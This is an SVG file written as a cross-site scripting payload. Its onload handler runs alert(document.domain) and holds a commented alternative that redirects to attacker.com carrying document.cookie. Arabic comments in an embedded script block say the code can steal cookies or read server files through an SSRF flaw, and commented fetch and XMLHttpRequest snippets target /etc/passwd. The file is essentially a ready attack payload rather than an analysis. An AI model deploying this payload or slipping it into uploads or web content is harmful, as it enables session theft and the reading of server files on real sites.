<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain); /* او window.location='http://attacker.com/?cookie='+document.cookie; */">
    <image href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" x="0" y="0" width="1" height="1" />
    <script>
        // هذا الكود يمكنه قراءة ملفات من السيرفر إذا كان الموقع فيه ثغرة SSRF أو يمكنه سرقة الكوكيز
        // مثلاً:
        // fetch('/etc/passwd').then(response => response.text()).then(data => alert(data));
        // أو:
        // var req = new XMLHttpRequest();
        // req.onload = () => { alert(req.responseText); };
        // req.open('GET', '/etc/passwd', false);
        // req.send();
    </script>
</svg>
